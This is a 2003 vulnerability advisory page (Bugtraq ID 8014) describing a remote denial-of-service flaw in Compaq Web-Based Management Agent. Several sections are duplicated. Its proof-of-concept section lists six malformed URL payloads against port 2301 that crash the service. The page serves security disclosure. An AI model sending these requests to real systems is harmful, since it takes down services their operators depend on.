Compaq Web-Based Management Agent Remote Stack Overflow Denial of Service Vulnerability
BID:8014
Info
Compaq Web-Based Management Agent Remote Stack Overflow Denial of Service Vulnerability
| Bugtraq ID: | 8014 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 23 2003 12:00AM |
| Updated: | Jun 23 2003 12:00AM |
| Credit: | This vulnerability was reported by Ian Vitek <[email protected]>. |
| Vulnerable: |
Compaq Web-Based Management Agent |
| Not Vulnerable: | |
Discussion
Compaq Web-Based Management Agent Remote Stack Overflow Denial of Service Vulnerability
Compaq Web-Based Management Agent has been reported prone to a remote denial of service vulnerability. The problem occurs when making malformed requests to the service. The resulting error reports a stack overflow, however it has not been confirmed whether this issue is exploitable to corrupt memory. The problem may in fact be the result of a NULL pointer dereference.
Compaq Web-Based Management Agent has been reported prone to a remote denial of service vulnerability. The problem occurs when making malformed requests to the service. The resulting error reports a stack overflow, however it has not been confirmed whether this issue is exploitable to corrupt memory. The problem may in fact be the result of a NULL pointer dereference.
Exploit / POC
Compaq Web-Based Management Agent Remote Stack Overflow Denial of Service Vulnerability
The following proof of concept examples have been supplied:
http://www.example.com:2301/survey/<!>
http://www.example.com:2301/<!.StringRedirecturl>
http://www.example.com:2301/<!.StringHttpRequest=Url>
http://www.example.com:2301/survey/<!.StringHttpRequest=Url>
http://www.example.com:2301/<!.ObjectIsapiECB>
http://www.example.com:2301/<!.StringIsapiECB=lpszPathInfo>
The following proof of concept examples have been supplied:
http://www.example.com:2301/survey/<!>
http://www.example.com:2301/<!.StringRedirecturl>
http://www.example.com:2301/<!.StringHttpRequest=Url>
http://www.example.com:2301/survey/<!.StringHttpRequest=Url>
http://www.example.com:2301/<!.ObjectIsapiECB>
http://www.example.com:2301/<!.StringIsapiECB=lpszPathInfo>
Solution / Fix
Compaq Web-Based Management Agent Remote Stack Overflow Denial of Service Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Compaq Web-Based Management Agent Remote Stack Overflow Denial of Service Vulnerability
References:
References: